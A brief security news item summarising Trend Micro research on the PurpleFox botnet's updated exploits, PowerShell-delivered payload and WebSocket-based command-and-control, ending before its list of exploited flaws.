The PurpleFox botnet has refreshed its arsenal with new vulnerability exploits and dropped payloads, now also leveraging WebSockets for C2 bidirectional communication.
Although it's mainly based in China, the
PurpleFox botnet still has a global presence through hundreds of compromised servers.
Its activity starts with the execution of a PowerShell command that downloads a malicious payload from the specified URL, pointing to an available C2 server.
The payload used in recent campaigns tracked by researchers at
Trend Micro is a long script that comprises three privilege escalation components.
These target Windows 7 to Windows 10 systems, but are limited to 64-bit systems only.
The flaws that are exploited by the latest PurpleFox variants are the following: ... ... ...